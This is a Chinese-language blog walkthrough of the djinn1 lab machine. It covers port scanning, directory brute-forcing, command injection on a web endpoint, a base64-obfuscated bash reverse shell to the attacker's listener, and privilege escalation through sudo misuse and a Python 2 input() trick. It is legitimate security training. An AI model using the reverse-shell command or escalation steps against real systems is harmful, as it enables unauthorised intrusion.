天道酬勤

djinn1-WALKTHROUGH

一、端口探测

靶机直接将IP打印在屏幕上,就不用去发现了。

直接进行端口扫描:

root@kali:~# nmap -sS -A 192.168.203.148 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:34 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.148
Host is up (0.00047s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp filtered ssh
MAC Address: 00:0C:29:63:02:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.203.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.28 seconds

仅仅开放了21端口,22端口被过滤掉了。(感觉又是考察了knocked

心中有些不放心,于是我继续扫一下全端口:

root@kali:~# nmap -sS -p1-65535 192.168.203.148 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:38 CST
Nmap scan report for 192.168.203.148
Host is up (0.00070s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
1337/tcp open     waste
7331/tcp open     swx
MAC Address: 00:0C:29:63:02:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds

果然有漏网之鱼,另外还开放了13377331端口。

使用telnet查看1337端口:

发现这是个游戏,回答1000个问题,之后会给我们一个礼物,但我们肯定不能去回答这1000次吧。

二、漏洞寻找

在浏览器中,访问了7331端口:

发现是这样的一个页面,利用dirb进行探测:

但是一直探测不出来,原因是dirb普通的字典不够强大:

我们去/usr/share/dirb/wordlists下查看dirb的词典:

选择使用big.txt进行爆破,他的字典数是最多的:

但是这样又出现了一种问题,尽管能爆破出来,但是会因为与目标机器有太多的错误,而导致中断。

最终我使用了dirsearch,采用的是dirbbig.txt字典。

跑出两个目录,紧接着对其进行访问:

目录genie是一个403:

目录/wish像是一个代码执行:

测试whoami

回显www-data,证明了漏洞的存在。

三、反弹shell

在kali开启监听

发现报错了,感觉像是被过滤掉了。

这里可以通过base编码,再利用管道符base64解码运行

不过通过检测,发现目标机器上没有nc(但后来拿到shell查询的时候其实是有nc的),那就换一条命令:

bash -i >& /dev/tcp/192.168.203.129/7777 0>&1

使用base64加密:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx

然后再使用如下命令:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx | base64 -d | bash

拿到shell:

四、提权

一顿摸索之后,发现权限好低:

啥也做不了。

不过还好,通过对隐藏文件的查找ls -la

nitish:p4ssw0rdStr3r0n9

因为没有开启ssh,所以我们直接su切换,并使用sudo -l

可以看到,我们可在无sam密码的情况下使用 genie

genie -h看一下用法:

genie的帮助说明提到使用-p,可以给我们一个shell,但是我们并没有得到该shell。

使用man命令查看关于genie更详细的帮助手册:

发现一条隐藏信息:

-cmd参数,我们尝试一下:

sudo -u sam genie -cmd id   #指定sam用户执行id命令

现在我们成功拿到了sam的权限。

再次执行sudo -l

发现sam用户可无需使用root密码执行lago

$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!! 
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
lago  proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Thu Feb 27 21:20:01 IST 2020
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

这篇靶机做的很不顺手,刚开始的目录爆破,再到后面的提权,都反映了自己不够细心。也由于自己不喜欢审查代码的原因,丢掉了很多线索。

其实最重要的线索就在我们刚拿到shell的目录:

app.py中我们可以得到关于nitish用户的信息:

之后,在我们拿下sam用户时,在/home/sam下看到:隐藏的pyc文件

对其进行反编译:

#!/usr/bin/env python
# encoding: utf-8
 
from getpass import getuser
from os import system
from random import randint
 
def naughtyboi():
    print 'Working on it!! '
 
 
def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'
 
 
def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)
 
 
def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice
 
 
def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'
 
if __name__ == '__main__':
    main(options())
from getpass import getuser
from os import system
from random import randint
 
def naughtyboi():
    print 'Working on it!! '
 
 
def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'
 
 
def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)
 
 
def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice
 
 
def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'
 
if __name__ == '__main__':
    main(options())

这块代码便解释了为何输入num进行提权。

大佬的文章:https://blog.csdn.net/fastergohome/article/details/103537057

其中还写了py脚本跑1000个加减,太强了,学习!

 

赞(2) 打赏
未经允许不得转载:HackerGu‘s Blog » djinn1-WALKTHROUGH
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏